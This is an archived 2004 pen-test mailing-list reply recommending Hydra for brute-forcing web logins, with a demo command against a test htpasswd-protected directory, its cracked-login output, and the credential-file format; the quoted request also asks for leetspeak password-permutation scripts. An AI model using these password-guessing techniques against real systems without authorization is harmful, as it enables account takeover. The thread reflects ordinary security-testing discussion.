RE: brute force tools

From: Robert E. Lee (robert@dyadsecurity.com)
Date: Fri May 21 2004 - 11:50:15 EDT

• Next message: John Madden: "Cached NT/W2k passwords"
• Previous message: Mister Coffee: "Re: RFID Tags"
• In reply to: don.williams@verizonwireless.com: "brute force tools"
• Next in thread: Andrés Roldán: "Re: brute force tools"
• Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]

Don,

I have had good luck with the 4.0 version of hydra. It's not 100%
intuitive, but it does work somewhat reliably once you get used to it.

For this demo I made a file called passlist that had 5 lines
(username:a, :aa, usename:aaa, foo:aaaa, bar:aaaaa). I set up a
htpasswd/htaccess pair that had username username and password a.

root:/var/tmp/hydra-4.0# hydra -l username -C ./passlist \
www.domain.com http /dir -s 80
Hydra v4.0 (c) 2004 by van Hauser / THC - use allowed only for legal
purposes.
Hydra (http://www.thc.org) starting at 2004-05-21 08:27:24
[DATA] 5 parallel tasks, 1 servers, 5 login tries (l:1/p:5), ~1 tries
per task
[DATA] attacking service www on port 80
[STATUS] attack finished for www.domain.com
[80][www] host: 333.333.333.333 login: username password: a
Hydra (http://www.thc.org) finished at 2004-05-21 08:27:25

With the -C option you set up a file that has the following syntax:
Username:password

I believe you may be able to get away with:
:password

I didn't see a good permuting option from the command line, but I'm sure
you could whip sometime up to play with your dictionary file prior to
use by hydra.

Best of luck :).

Robert

-----Original Message-----
From: don.williams@verizonwireless.com
[mailto:don.williams@verizonwireless.com]
Sent: Thursday, May 20, 2004 4:34 PM
To: pen-test@securityfocus.com
Subject: brute force tools

Frequently I attempt to brute force web applications and have found a
few problems with the programs I have used. For instance Brutus always
informs me a few successful attempts yet when I try they fail. (2)
Webcrack not reliable.

What I would like is some other tools you may have used with good
success and hopefully a perl based script which enumerate common words
substituting letters for numbers as users do everyday (ie. pa$$w0rd).
Also attempting the crack ColdFusion it only requests the password not
the user name / password combo as most tools only allow. Windows or
Linux is fine.

Thx

• Next message: John Madden: "Cached NT/W2k passwords"
• Previous message: Mister Coffee: "Re: RFID Tags"
• In reply to: don.williams@verizonwireless.com: "brute force tools"
• Next in thread: Andrés Roldán: "Re: brute force tools"
• Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]

This archive was generated by hypermail 2.1.7 : Sat Apr 12 2008 - 10:53:55 EDT